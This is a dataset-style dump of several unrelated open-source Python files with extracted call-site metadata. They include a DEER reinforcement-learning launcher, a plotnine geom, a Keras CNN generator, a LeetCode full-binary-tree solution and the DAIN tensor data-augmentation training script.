print('}')
# print("const std::vector<std::tuple<uint32_t, uint32_t, uint64_t>> vs = {")
# for _ in range(N):
# print(" {{ 0x{:08x}, 0x{:08x}, 0x{:016x} }},".format(
# randU32(), randU32(), randU64()))
# print("};")
| [((10, 20, 10, 45), 'random.randint', 'random.randint', ({(10, 35, 10, 36): '(1)', (10, 38, 10, 44): '(2 ** x - 1)'}, {}), '(1, 2 ** x - 1)', False, 'import random\n')] |
aaspeel/deer | examples/toy_env/run_toy_env.py | 3ced3695f0ca8537337019d2e3ec0ff8bd346d91 | """Toy environment launcher. See the docs for more details about this environment.
"""
import sys
import logging
import numpy as np
from deer.default_parser import process_args
from deer.agent import NeuralAgent
from deer.learning_algos.q_net_keras import MyQNetwork
from Toy_env import MyEnv as Toy_env
import deer.experiment.base_controllers as bc
from deer.policies import EpsilonGreedyPolicy
class Defaults:
# ----------------------
# Experiment Parameters
# ----------------------
STEPS_PER_EPOCH = 1000
EPOCHS = 50
STEPS_PER_TEST = 500
PERIOD_BTW_SUMMARY_PERFS = 1
# ----------------------
# Environment Parameters
# ----------------------
FRAME_SKIP = 1
# ----------------------
# DQN Agent parameters:
# ----------------------
UPDATE_RULE = 'rmsprop'
LEARNING_RATE = 0.005
LEARNING_RATE_DECAY = 1.
DISCOUNT = 0.9
DISCOUNT_INC = 1.
DISCOUNT_MAX = 0.99
RMS_DECAY = 0.9
RMS_EPSILON = 0.0001
MOMENTUM = 0
CLIP_NORM = 1.0
EPSILON_START = 1.0
EPSILON_MIN = .1
EPSILON_DECAY = 10000
UPDATE_FREQUENCY = 1
REPLAY_MEMORY_SIZE = 1000000
BATCH_SIZE = 32
FREEZE_INTERVAL = 1000
DETERMINISTIC = True
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
# --- Parse parameters ---
parameters = process_args(sys.argv[1:], Defaults)
if parameters.deterministic:
rng = np.random.RandomState(123456)
else:
rng = np.random.RandomState()
# --- Instantiate environment ---
env = Toy_env(rng)
# --- Instantiate qnetwork ---
qnetwork = MyQNetwork(
env,
parameters.rms_decay,
parameters.rms_epsilon,
parameters.momentum,
parameters.clip_norm,
parameters.freeze_interval,
parameters.batch_size,
parameters.update_rule,
rng)
train_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.1)
test_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.)
# --- Instantiate agent ---
agent = NeuralAgent(
env,
qnetwork,
parameters.replay_memory_size,
max(env.inputDimensions()[i][0] for i in range(len(env.inputDimensions()))),
parameters.batch_size,
rng,
train_policy=train_policy,
test_policy=test_policy)
# --- Bind controllers to the agent ---
# Before every training epoch (periodicity=1), we want to print a summary of the agent's epsilon, discount and
# learning rate as well as the training epoch number.
agent.attach(bc.VerboseController(
evaluate_on='epoch',
periodicity=1))
# During training epochs, we want to train the agent after every [parameters.update_frequency] action it takes.
    # Plus, we also want to display, after each training episode (not after every training step), the average Bellman
    # residual and the average of the V values obtained during the last episode, hence the two last arguments.
agent.attach(bc.TrainerController(
evaluate_on='action',
periodicity=parameters.update_frequency,
show_episode_avg_V_value=True,
show_avg_Bellman_residual=True))
    # At the end of every epoch, the learning rate can be modified using a LearningRateController. Here we
    # update the learning rate after every training epoch (periodicity=1), according to the parameters given.
agent.attach(bc.LearningRateController(
initial_learning_rate=parameters.learning_rate,
learning_rate_decay=parameters.learning_rate_decay,
periodicity=1))
# Same for the discount factor.
agent.attach(bc.DiscountFactorController(
initial_discount_factor=parameters.discount,
discount_factor_growth=parameters.discount_inc,
discount_factor_max=parameters.discount_max,
periodicity=1))
# As for the discount factor and the learning rate, one can update periodically the parameter of the epsilon-greedy
# policy implemented by the agent. This controllers has a bit more capabilities, as it allows one to choose more
# precisely when to update epsilon: after every X action, episode or epoch. This parameter can also be reset every
# episode or epoch (or never, hence the resetEvery='none').
agent.attach(bc.EpsilonController(
initial_e=parameters.epsilon_start,
e_decays=parameters.epsilon_decay,
e_min=parameters.epsilon_min,
evaluate_on='action',
periodicity=1,
reset_every='none'))
    # All previous controllers control the agent during the epochs it goes through. However, we want to interleave a
    # "test epoch" between training epochs (here after every one of them, hence the periodicity=1). We do not want
    # these test epochs to interfere with the training of the agent, which is well handled by the TrainerController,
    # EpsilonController and the like. Therefore, we will disable these controllers for the whole duration of the test
    # epochs interleaved this way, using the controllersToDisable argument of the InterleavedTestEpochController.
    # The value of this argument is a list of the indexes of all controllers to disable, their index reflecting the
    # order in which they were added. Here, "0" refers to the first attached controller, thus the
    # VerboseController; "2" refers to the third attached controller, thus the LearningRateController; etc. The order
    # in which the indexes are listed is not important.
# For each test epoch, we want also to display the sum of all rewards obtained, hence the showScore=True.
# Finally, we want to call the summarizePerformance method of Toy_Env every [parameters.period_btw_summary_perfs]
# *test* epochs.
agent.attach(bc.InterleavedTestEpochController(
id=0,
epoch_length=parameters.steps_per_test,
periodicity=1,
show_score=True,
summarize_every=parameters.period_btw_summary_perfs))
# --- Run the experiment ---
agent.run(parameters.epochs, parameters.steps_per_epoch)
| [((55, 4, 55, 43), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((58, 17, 58, 53), 'deer.default_parser.process_args', 'process_args', ({(58, 30, 58, 42): 'sys.argv[1:]', (58, 44, 58, 52): 'Defaults'}, {}), '(sys.argv[1:], Defaults)', False, 'from deer.default_parser import process_args\n'), ((65, 10, 65, 22), 'Toy_env.MyEnv', 'Toy_env', ({(65, 18, 65, 21): 'rng'}, {}), '(rng)', True, 'from Toy_env import MyEnv as Toy_env\n'), ((68, 15, 77, 12), 'deer.learning_algos.q_net_keras.MyQNetwork', 'MyQNetwork', ({(69, 8, 69, 11): 'env', (70, 8, 70, 28): 'parameters.rms_decay', (71, 8, 71, 30): 'parameters.rms_epsilon', (72, 8, 72, 27): 'parameters.momentum', (73, 8, 73, 28): 'parameters.clip_norm', (74, 8, 74, 34): 'parameters.freeze_interval', (75, 8, 75, 29): 'parameters.batch_size', (76, 8, 76, 30): 'parameters.update_rule', (77, 8, 77, 11): 'rng'}, {}), '(env, parameters.rms_decay, parameters.rms_epsilon, parameters.\n momentum, parameters.clip_norm, parameters.freeze_interval, parameters.\n batch_size, parameters.update_rule, rng)', False, 'from deer.learning_algos.q_net_keras import MyQNetwork\n'), ((60, 14, 60, 43), 'numpy.random.RandomState', 'np.random.RandomState', ({(60, 36, 60, 42): '123456'}, {}), '(123456)', True, 'import numpy as np\n'), ((62, 14, 62, 37), 'numpy.random.RandomState', 'np.random.RandomState', ({}, {}), '()', True, 'import numpy as np\n'), ((96, 17, 98, 22), 'deer.experiment.base_controllers.VerboseController', 'bc.VerboseController', (), '', True, 'import deer.experiment.base_controllers as bc\n'), ((103, 17, 107, 39), 'deer.experiment.base_controllers.TrainerController', 'bc.TrainerController', (), '', True, 'import deer.experiment.base_controllers as bc\n'), ((111, 17, 114, 22), 'deer.experiment.base_controllers.LearningRateController', 'bc.LearningRateController', (), '', True, 'import deer.experiment.base_controllers as bc\n'), ((117, 17, 121, 22), 'deer.experiment.base_controllers.DiscountFactorController', 'bc.DiscountFactorController', (), '', True, 'import deer.experiment.base_controllers as bc\n'), ((127, 17, 133, 27), 'deer.experiment.base_controllers.EpsilonController', 'bc.EpsilonController', (), '', True, 'import deer.experiment.base_controllers as bc\n'), ((147, 17, 152, 60), 'deer.experiment.base_controllers.InterleavedTestEpochController', 'bc.InterleavedTestEpochController', (), '', True, 'import deer.experiment.base_controllers as bc\n')] |
Dynamical-Systems-Laboratory/IPMCsMD | equilibration/sodium_models/seed_1/post_processing/rdf_calculations.py | 7f0662568d37dce7dcd07b648284aa62991d343c | # ------------------------------------------------------------------
#
# RDF and CN related analysis
#
# ------------------------------------------------------------------
import sys
py_path = '../../../../postprocessing/'
sys.path.insert(0, py_path)
py_path = '../../../../postprocessing/io_operations/'
sys.path.insert(0, py_path)
import cn_and_rdf_lmp as crl
import io_module as io
#
# Input
#
# RDF and CN input file
rdf_file = '../nafion.rdf'
# Output file
out_file = 'rdf_cn_averaged.txt'
# Number of bins
nbins = 300
# Number of columns
ncols = 10
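# Average the RDF and coordination-number columns over all recorded timesteps
# and write the result to out_file (behavior inferred from the helper's name;
# see cn_and_rdf_lmp for the actual implementation).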
crl.compute_time_average(rdf_file, out_file, nbins, ncols)
| [((9, 0, 9, 27), 'sys.path.insert', 'sys.path.insert', ({(9, 16, 9, 17): '(0)', (9, 19, 9, 26): 'py_path'}, {}), '(0, py_path)', False, 'import sys\n'), ((11, 0, 11, 27), 'sys.path.insert', 'sys.path.insert', ({(11, 16, 11, 17): '(0)', (11, 19, 11, 26): 'py_path'}, {}), '(0, py_path)', False, 'import sys\n'), ((32, 0, 32, 58), 'cn_and_rdf_lmp.compute_time_average', 'crl.compute_time_average', ({(32, 25, 32, 33): 'rdf_file', (32, 35, 32, 43): 'out_file', (32, 45, 32, 50): 'nbins', (32, 52, 32, 57): 'ncols'}, {}), '(rdf_file, out_file, nbins, ncols)', True, 'import cn_and_rdf_lmp as crl\n')] |
EkremBayar/bayar | venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py | aad1a32044da671d0b4f11908416044753360b39 | from ..doctools import document
from .geom import geom
from .geom_path import geom_path
from .geom_point import geom_point
from .geom_linerange import geom_linerange
@document
class geom_pointrange(geom):
"""
Vertical interval represented by a line with a point
{usage}
Parameters
----------
{common_parameters}
fatten : float, optional (default: 2)
A multiplicative factor used to increase the size of the
point along the line-range.
"""
DEFAULT_AES = {'alpha': 1, 'color': 'black', 'fill': None,
'linetype': 'solid', 'shape': 'o', 'size': 0.5}
REQUIRED_AES = {'x', 'y', 'ymin', 'ymax'}
DEFAULT_PARAMS = {'stat': 'identity', 'position': 'identity',
'na_rm': False, 'fatten': 4}
@staticmethod
def draw_group(data, panel_params, coord, ax, **params):
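        # Draw the vertical line-range first, then overlay the point,
        # fattened by params['fatten'] relative to the range's line size.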
geom_linerange.draw_group(data.copy(), panel_params,
coord, ax, **params)
data['size'] = data['size'] * params['fatten']
data['stroke'] = geom_point.DEFAULT_AES['stroke']
geom_point.draw_group(data, panel_params, coord, ax, **params)
@staticmethod
def draw_legend(data, da, lyr):
"""
Draw a point in the box
Parameters
----------
data : dataframe
da : DrawingArea
lyr : layer
Returns
-------
out : DrawingArea
"""
geom_path.draw_legend(data, da, lyr)
data['size'] = data['size'] * lyr.geom.params['fatten']
data['stroke'] = geom_point.DEFAULT_AES['stroke']
geom_point.draw_legend(data, da, lyr)
return da
| [] |
SummaLabs/DLS | app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py | 2adba47430b456ad0f324e4c8883a896a23b3fbf | #!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'ar'
import json
import os
import skimage.io as skio
import matplotlib.pyplot as plt
import numpy as np
import keras
from keras.models import Model
from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense
from keras.utils.visualize_util import plot as kplot
##################################
def buildModelCNN(inpShape=(3,128,128), sizFlt = 3, numFltStart=16, numCls=2, numHidden=128, funact='relu'):
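    # Functional-API Keras CNN: five Conv2D + MaxPooling2D blocks whose filter
    # counts grow as multiples of numFltStart, flattened into an optional
    # hidden Dense layer and a softmax classifier over numCls classes.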
inpData = Input(shape=inpShape)
# Conv 1'st
x = Convolution2D(nb_filter=1 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(inpData)
x = MaxPooling2D(pool_size=(2,2))(x)
# Conv 2'nd
x = Convolution2D(nb_filter=2 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2,2))(x)
# Conv 3'rd
x = Convolution2D(nb_filter=3 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Conv 4'th
x = Convolution2D(nb_filter=4 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Conv 5'th
x = Convolution2D(nb_filter=5 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
#
x = Flatten()(x)
if numHidden is not None:
x = Dense(output_dim=numHidden, activation=funact)(x)
x = Dense(output_dim=numCls, activation='softmax')(x)
retModel = Model(inpData, x)
return retModel
##################################
def getBasicModelTemplate(modelName='model_1'):
retTemplate = {
"class_name": "Model",
"keras_version": keras.__version__,
"config": {
"name": "%s" % modelName,
"layers" : [],
"input_layers": [],
"output_layers": [],
}
}
return retTemplate
def generateModelJsonDict(model):
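    # Rebuild the Keras Functional-API JSON config by hand: each layer keeps
    # its own config, and inbound_nodes chains every layer to the previous
    # one, so this only reproduces strictly sequential (single-path) models.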
tmpl = getBasicModelTemplate()
tmpLayers = []
for ii,ll in enumerate(model.layers):
tmp = {
'class_name': type(ll).__name__,
'name': ll.name,
'config': ll.get_config(),
}
if ii==0:
tmp['inbound_nodes'] = []
else:
tmp['inbound_nodes'] = [[
[
model.layers[ii-1].name,
0,
0
]
]]
tmpLayers.append(tmp)
tmpl['config']['layers'] = tmpLayers
tmpl['config']['input_layers'] = [
[
model.layers[0].name,
0,
0
]
]
tmpl['config']['output_layers'] = [
[
model.layers[-1].name,
0,
0
]
]
return tmpl
##################################
if __name__ == '__main__':
model = buildModelCNN(inpShape=(3, 128, 128))
fimgModel = 'keras-model-cnn.jpg'
kplot(model, fimgModel, show_shapes=True)
# plt.imshow(skio.imread(fimgModel))
# plt.show()
model.summary()
print ('------')
numLayers = len(model.layers)
for ii,ll in enumerate(model.layers):
print ('[%d/%d] : %s' % (ii, numLayers, ll))
modelJson = generateModelJsonDict(model)
print ('----------------------')
print (json.dumps(modelJson, indent=4))
foutJson = 'test-model-cnn.json'
with open(foutJson, 'w') as f:
json.dump(modelJson, f, indent=4)
# print (json.dumps(modelJson, indent=4))
| [((18, 14, 18, 35), 'keras.layers.Input', 'Input', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((44, 15, 44, 32), 'keras.models.Model', 'Model', ({(44, 21, 44, 28): 'inpData', (44, 30, 44, 31): 'x'}, {}), '(inpData, x)', False, 'from keras.models import Model\n'), ((102, 4, 102, 45), 'keras.utils.visualize_util.plot', 'kplot', (), '', True, 'from keras.utils.visualize_util import plot as kplot\n'), ((20, 8, 21, 41), 'keras.layers.Convolution2D', 'Convolution2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((22, 8, 22, 37), 'keras.layers.MaxPooling2D', 'MaxPooling2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((24, 8, 25, 41), 'keras.layers.Convolution2D', 'Convolution2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((26, 8, 26, 37), 'keras.layers.MaxPooling2D', 'MaxPooling2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((28, 8, 29, 41), 'keras.layers.Convolution2D', 'Convolution2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((30, 8, 30, 38), 'keras.layers.MaxPooling2D', 'MaxPooling2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((32, 8, 33, 41), 'keras.layers.Convolution2D', 'Convolution2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((34, 8, 34, 38), 'keras.layers.MaxPooling2D', 'MaxPooling2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((36, 8, 37, 41), 'keras.layers.Convolution2D', 'Convolution2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((38, 8, 38, 38), 'keras.layers.MaxPooling2D', 'MaxPooling2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((40, 8, 40, 17), 'keras.layers.Flatten', 'Flatten', ({}, {}), '()', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((43, 8, 43, 54), 'keras.layers.Dense', 'Dense', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((112, 11, 112, 42), 'json.dumps', 'json.dumps', (), '', False, 'import json\n'), ((115, 8, 115, 41), 'json.dump', 'json.dump', (), '', False, 'import json\n'), ((42, 12, 42, 58), 'keras.layers.Dense', 'Dense', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n')] |
Synodic-Software/CPPython | tests/integration/test_interface.py | 12e9acdf68e54d45bcf0b6c137d4fe627d1f6877 | """
Test the integrations related to the internal interface implementation and the 'Interface' interface itself
"""
import pytest
from cppython_core.schema import InterfaceConfiguration
from pytest_cppython.plugin import InterfaceIntegrationTests
from cppython.console import ConsoleInterface
class TestCLIInterface(InterfaceIntegrationTests):
"""
The tests for our CLI interface
"""
@pytest.fixture(name="interface")
def fixture_interface(self):
"""
Override of the plugin provided interface fixture.
Returns:
ConsoleInterface -- The Interface object to use for the CPPython defined tests
"""
configuration = InterfaceConfiguration()
return ConsoleInterface(configuration)
| [((17, 5, 17, 37), 'pytest.fixture', 'pytest.fixture', (), '', False, 'import pytest\n'), ((25, 24, 25, 48), 'cppython_core.schema.InterfaceConfiguration', 'InterfaceConfiguration', ({}, {}), '()', False, 'from cppython_core.schema import InterfaceConfiguration\n'), ((26, 15, 26, 46), 'cppython.console.ConsoleInterface', 'ConsoleInterface', ({(26, 32, 26, 45): 'configuration'}, {}), '(configuration)', False, 'from cppython.console import ConsoleInterface\n')] |
sm2774us/amazon_interview_prep_2021 | solutions/python3/894.py | f580080e4a6b712b0b295bb429bf676eb15668de | class Solution:
def allPossibleFBT(self, N):
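        # LeetCode 894: build every full binary tree on N nodes (values all 0).
        # Assumes the judge-provided TreeNode definition is in scope. constr(N)
        # yields roots by giving the left subtree i nodes (i odd) and the right
        # subtree the remaining N - i - 1 nodes; an even N yields nothing.
        # Note that subtrees are shared between the yielded roots.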
def constr(N):
if N == 1: yield TreeNode(0)
for i in range(1, N, 2):
for l in constr(i):
for r in constr(N - i - 1):
m = TreeNode(0)
m.left = l
m.right = r
yield m
return list(constr(N)) | [] |
srijankr/DAIN | src/main.py | 89edec24e63383dfd5ef19f2bfb48d11b75b3dde | #@contact Sejoon Oh ([email protected]), Georgia Institute of Technology
#@version 1.0
#@date 2021-08-17
#Influence-guided Data Augmentation for Neural Tensor Completion (DAIN)
#This software is free of charge for research purposes.
#For commercial purposes, please contact the main author.
import torch
from torch import nn
from torch.utils.data import Dataset, DataLoader
import argparse
import numpy as np
from dataset import TensorDataset
import torch.optim as optim
from model import MLP
import pandas as pd
import copy
import random
from sklearn.model_selection import train_test_split
import os
def parse_args():
parser = argparse.ArgumentParser(description="Run DAIN for the MLP architecture")
parser.add_argument('--path', nargs='?', default='data/synthetic_10K.tensor',
help='Input data path.')
parser.add_argument('--epochs', type=int, default=50,
help='Number of epochs.')
parser.add_argument('--batch_size', type=int, default=1024,
help='Batch size.')
parser.add_argument('--layers', nargs='?', default='[150,1024,1024,128]',
help="Size of each layer. Note that the first layer is the concatenation of tensor embeddings. So layers[0]/N (N=order) is the tensor embedding size.")
parser.add_argument('--lr', type=float, default=0.001,
help='Learning rate.')
parser.add_argument('--verbose', type=int, default=5,
help='Show performance per X iterations')
parser.add_argument('--gpu', type=str, default='0',
help='GPU number')
parser.add_argument('--output', type=str, default='demo.txt',
help = 'output name')
parser.add_argument('--train_ratio', type=float, default=0.9,
help = 'Ratio of training data')
return parser.parse_args()
def model_train_and_test(args, model, train_loader, val_loader,test_loader,first):
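    # Trains with Adam/MSE and stops early once validation loss has not
    # improved for 10 epochs. When first=True it also records, per epoch and
    # per sample, the intermediate activation times the prediction error in
    # model.allgrad (the last-layer gradient signal later used for influence).
    # Returns the test RMSE at the best-validation epoch and a snapshot of
    # that model.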
output_path = 'output/'+args.output
criterion = nn.MSELoss()
optimizer = optim.Adam(model.parameters(), lr = args.lr)
device = model.device
min_val,min_test,min_epoch,final_model = 9999,9999,0,0
for epoch in range(args.epochs):
torch.cuda.empty_cache()
running_loss = 0.0
train_loss,valid_loss = 0,0
for i, data in enumerate(val_loader, 0):
inputs, labels, indices = data[0].to(device), data[1].to(device),data[2]
outputs = model(inputs).flatten()
if first==True:
inter = model.intermediate.cpu().detach().clone()
error = (outputs - labels).reshape(-1,1).cpu().detach().clone()
model.allgrad[epoch,indices,:] = torch.mul(inter,error)
loss = criterion(outputs,labels)
loss.backward()
valid_loss += loss.item()
del inputs,labels,outputs,model.intermediate
valid_loss /= (i+1)
test_loss, test_accuracy = 0,0
for i, data in enumerate(test_loader, 0):
inputs, labels,indices = data[0].to(device), data[1].to(device),data[2]
prediction = model(inputs).flatten()
loss = criterion(prediction,labels)
loss.backward()
test_accuracy += torch.sum(torch.pow((prediction-labels),2)).cpu().item()
del inputs,labels,prediction,model.intermediate
test_accuracy/=len(test_loader.dataset)
for i, data in enumerate(train_loader, 0):
inputs, labels,indices = data[0].to(device), data[1].to(device),data[2]
optimizer.zero_grad()
outputs = model(inputs).flatten()
if first==True:
inter = model.intermediate.cpu().detach().clone()
error = (outputs-labels).reshape(-1,1).cpu().detach().clone()
model.allgrad[epoch,indices,:] = torch.mul(inter,error)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
train_loss += loss.item()
del inputs, labels, outputs,indices,model.intermediate
train_loss /= (i+1)
if epoch%args.verbose==0:
print('[%d] Train loss: %.3f\tValid loss = %.6f\t(Test RMSE = %.6f)\t' % (epoch + 1, train_loss, valid_loss,test_accuracy))
print('[%d] Train loss: %.3f\tValid loss = %.6f\t(Test RMSE = %.6f)\t' % (epoch + 1, train_loss, valid_loss,test_accuracy),file=open(output_path,"a"),flush=True)
if min_val<=valid_loss and epoch-min_epoch>=10:
break
if min_val>valid_loss:
min_val = valid_loss
min_test = test_accuracy
min_epoch = epoch
final_model = copy.deepcopy(model)
final_model.allgrad = copy.deepcopy(model.allgrad)
final_model.checkpoint = epoch+1
print('Finished Training\nFinal Test RMSE = {} @ (Epoch,validation loss) ({},{})\n'.format(min_test,min_epoch,min_val))
print('Finished Training\nFinal Test RMSE = {} @ (Epoch,validation loss) ({},{})\n'.format(min_test,min_epoch,min_val), file=open(output_path, "a"),flush=True)
del model
return min_test,final_model
def data_augmentation(trainset,new_tensor,new_val,val_loader,test_loader,args,device):
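    # With an empty new_tensor this performs Steps 1-2: train embeddings from
    # scratch and score each training cell by the inner product of its
    # per-epoch gradient signal with the summed validation gradient signal
    # (its influence), normalized by the maximum. With augmented cells it
    # simply retrains on train + augmented data. Returns (test RMSE, model).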
#Step 4: data augmentation
if new_tensor.shape[0]!=0:
cur_trainset = copy.deepcopy(trainset)
new_indices = torch.zeros(new_tensor.shape[0]).long()
cur_trainset.add(new_tensor,new_val,new_indices)
first = False
#Step 1: tensor embedding learning
else:
cur_trainset = copy.deepcopy(trainset)
first = True
layers = eval(args.layers)
train_loader = DataLoader(cur_trainset, batch_size=args.batch_size,shuffle=True)
model = MLP(cur_trainset, device, layers=layers).to(device)
model.allgrad = []
if first==True:
model.allgrad = torch.zeros(int(args.epochs),len(cur_trainset)+len(val_loader.dataset)+len(test_loader.dataset),model.last_size)
test_rmse,final_model = model_train_and_test(args, model, train_loader, val_loader, test_loader,first)
del cur_trainset
if new_tensor.shape[0]!=0:
del new_tensor
if new_val.shape[0]!=0:
del new_val
del model
if first==True:
print('[DONE] Step 1: tensor embedding learning')
#Step 2: cell importance calculation
train_idx,val_idx,test_idx = train_loader.dataset.indices,val_loader.dataset.indices,test_loader.dataset.indices
checkpoint = final_model.checkpoint
val_grad = torch.sum(final_model.allgrad[:checkpoint,val_idx,:],dim=1).squeeze()
maxv,maxp = -9999,0
final_model.importance = np.zeros(len(trainset))
for (i,idx) in enumerate(trainset.indices):
train_grad = final_model.allgrad[:checkpoint,idx,:].squeeze()
contribution = torch.mul(train_grad,val_grad)
final_contribution = torch.sum(torch.sum(contribution,dim=1),dim=0).item()
final_model.importance[i] = final_contribution
final_model.importance = final_model.importance / max(final_model.importance)
return (test_rmse,final_model)
def main():
args = parse_args()
path = args.path
layers = eval(args.layers)
learning_rate = args.lr
batch_size = args.batch_size
epochs = args.epochs
verbose = args.verbose
output_path = 'output/'+args.output
if os.path.exists('output/')==False:
os.mkdir('output/')
dataset = TensorDataset(path)
trainset,valset, testset,indices = copy.deepcopy(dataset),copy.deepcopy(dataset),copy.deepcopy(dataset),np.arange(dataset.num_data)
data_train, data_test, labels_train, labels_test, index_train, index_test = train_test_split(dataset.tensor.numpy(), dataset.val.numpy(), indices, test_size=1-args.train_ratio)
data_train, data_val, labels_train, labels_val, index_train, index_val = train_test_split(data_train, labels_train, index_train, test_size=0.2)
trainset.tensor,trainset.val,trainset.num_data,trainset.indices = torch.from_numpy(data_train).long(),torch.from_numpy(labels_train).float(),data_train.shape[0],torch.from_numpy(index_train).long()
valset.tensor,valset.val,valset.num_data,valset.indices = torch.from_numpy(data_val).long(),torch.from_numpy(labels_val).float(),data_val.shape[0],torch.from_numpy(index_val).long()
testset.tensor, testset.val, testset.num_data,testset.indices = torch.from_numpy(data_test).long(), torch.from_numpy(labels_test).float(), data_test.shape[0],torch.from_numpy(index_test).long()
train_loader = DataLoader(trainset, batch_size=batch_size, shuffle=True)
val_loader = DataLoader(valset, batch_size=batch_size, shuffle=True)
test_loader = DataLoader(testset, batch_size=batch_size, shuffle=True)
print('[DONE] Step 0: Dataset loading & train-val-test split')
print(dataset.dimensionality)
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu
# CUDA for PyTorch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(device)
#Step 1&2. Train tensor embeddings & calculate cell importance
(rmse,model) = data_augmentation(trainset,torch.empty(0),torch.empty(0),val_loader,test_loader,args,device)
print('Test RMSE before 50% data augmentation = {}'.format(rmse))
print('Test RMSE before 50% data augmentation = {}'.format(rmse),file=open(output_path,"a"))
original = copy.deepcopy(model)
del model
cell_importance = abs(original.importance)
print('[DONE] Step 2: cell importance calculation')
#Step 3. entity importance calculation
entity_importance = [np.zeros(dataset.dimensionality[i]) for i in range(dataset.order)]
for i in range(len(cell_importance)):
for j in range(dataset.order):
entity = int(trainset.tensor[i,j])
entity_importance[j][entity] += cell_importance[i]
for i in range(dataset.order):
cur = entity_importance[i]
entity_importance[i] = cur/sum(cur)
print('[DONE] Step 3: entity importance calculation')
num_aug = int(0.5 * trainset.tensor.shape[0])
print('Number of augmented data = {}\tTotal number of training data = {}'.format(num_aug,num_aug+len(trainset)))
print('Number of augmented data = {}\tTotal number of training data = {}'.format(num_aug,num_aug+len(trainset)), file=open(output_path, "a"),flush=True)
#Step 4. perform data augmentation
indices = np.zeros((num_aug,trainset.order))
for i in range(dataset.order):
indices[:,i] = np.random.choice(list(range(0,dataset.dimensionality[i])),size=num_aug,p = entity_importance[i])
new_tensor = torch.from_numpy(indices).long()
new_val = original.predict(new_tensor)
print('[DONE] Step 4: data augmentation with entity importance')
(rmse,model) = data_augmentation(trainset,new_tensor,new_val,val_loader,test_loader,args,device)
print('Test RMSE after 50% data augmentation = {}'.format(rmse))
print('Test RMSE after 50% data augmentation = {}'.format(rmse),file=open(output_path,"a"))
del model
if __name__ == "__main__":
main()
| [((23, 13, 23, 85), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (), '', False, 'import argparse\n'), ((47, 16, 47, 28), 'torch.nn.MSELoss', 'nn.MSELoss', ({}, {}), '()', False, 'from torch import nn\n'), ((130, 19, 130, 84), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import Dataset, DataLoader\n'), ((178, 14, 178, 33), 'dataset.TensorDataset', 'TensorDataset', ({(178, 28, 178, 32): 'path'}, {}), '(path)', False, 'from dataset import TensorDataset\n'), ((182, 77, 182, 147), 'sklearn.model_selection.train_test_split', 'train_test_split', (), '', False, 'from sklearn.model_selection import train_test_split\n'), ((187, 19, 187, 76), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import Dataset, DataLoader\n'), ((188, 17, 188, 72), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import Dataset, DataLoader\n'), ((189, 18, 189, 74), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import Dataset, DataLoader\n'), ((205, 15, 205, 35), 'copy.deepcopy', 'copy.deepcopy', ({(205, 29, 205, 34): 'model'}, {}), '(model)', False, 'import copy\n'), ((230, 14, 230, 48), 'numpy.zeros', 'np.zeros', ({(230, 23, 230, 47): '(num_aug, trainset.order)'}, {}), '((num_aug, trainset.order))', True, 'import numpy as np\n'), ((54, 8, 54, 32), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ({}, {}), '()', False, 'import torch\n'), ((120, 23, 120, 46), 'copy.deepcopy', 'copy.deepcopy', ({(120, 37, 120, 45): 'trainset'}, {}), '(trainset)', False, 'import copy\n'), ((126, 23, 126, 46), 'copy.deepcopy', 'copy.deepcopy', ({(126, 37, 126, 45): 'trainset'}, {}), '(trainset)', False, 'import copy\n'), ((175, 7, 175, 32), 'os.path.exists', 'os.path.exists', ({(175, 22, 175, 31): '"""output/"""'}, {}), "('output/')", False, 'import os\n'), ((176, 8, 176, 27), 'os.mkdir', 'os.mkdir', ({(176, 17, 176, 26): '"""output/"""'}, {}), "('output/')", 